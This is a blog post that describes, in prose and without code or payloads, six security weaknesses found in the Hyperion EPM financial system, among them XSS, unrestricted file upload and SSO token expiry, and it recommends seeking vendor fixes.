This blog lists the security vulnerabilities and threats present in the EPM system, which can lead to misuse of highly sensitive financial data and information.
Data and Information security is an important concern for every organization, and when a system stores, processes and manages highly sensitive financial data - it becomes even more critical for organizations to opt for the highest controls to ensure system and data security.
EPM suite helps to deliver a comprehensive, integrated suite
of applications featuring common Web interface and reporting tools. It stores
and processes financial information of organizations belonging to various
fields (some of the example could be banking, manufacturing, Medical, Public
sectors). Vulnerabilities and threat
present in such a system can lead to a huge negative impact on the
organizations.
I am listing few critical security vulnerabilities which are present in EPM system:
Reflected Cross-Site Scripting: EPM Hyperion processes the user inputs on the server without performing the validations on the inputs. This behaviour of EPM makes it vulnerable to reflected cross-site scripting. The malicious input reflects back in the subsequent HTTP response. With a compromised user session, an attacker can perform unauthorized actions in system, like tracking the user operations, redirecting the user to a fake site, modifying the web page, and exploiting the browser.
- Unrestricted File
Upload to Hyperion system: The Hyperion web application does not validate
the type and content of files before they are uploaded to the server.
Executable files can be loaded and downloaded on the server. This allows an
attacker to upload malicious files (including viruses, malware, trojans or
executable files) with the intention of them being downloaded by other users.
- Clear Text Traffic: The Hyperion application servers/infrastructure is not configured to enforce to use encryption when communicating with other hosts. Having secured communication not enforced in a highly sensitive system can be subjected to a number of passive and active network attacks that may result in the interception and/or modification of the transmitted data.
- Web Server Version
Disclosure: The Hyperion web servers expose sensitive information in their
headers.
As part of the HTTP/1.1 standard, web application servers append information about the software used to handle the request in the response headers. These headers unintentionally reveal sensitive information like server type and version. Knowing the server type and versions allows an attacker to research published vulnerabilities associated with that specific server. Information gained can be used to launch more targeted, sophisticated attacks against the system.
-
Client Side Control
Bypass: The Hyperion web application relies on client side controls to
prevent users accessing certain functionality.
By modifying HTML elements and JavaScript responses, it is possible for users without authorization to access the Configuration Settings and Credentials Used For Pass-Through functionality.
A malicious user can modify the configuration settings and pass-through credentials without the required permissions, which may cause integrity and non-repudiation issues.
- Improper SSO Token
Expiration : Upon a disconnect command (click on disconnect button) is
issued by a user, the Hyperion SmartView/Disclosure Management plugin does not
invalidate a user's SSO Token. Hijackers can use this opportunity to perform
session hijacking in the application. The hijacker can then view the sensitive
information and perform actions on behalf of the victim user in the
application.
Few of these vulnerabilities can be remediated by implementing the fix provided by Vendor and hence it is highly recommended to raise these vulnerabilities with vendor to seek remediation.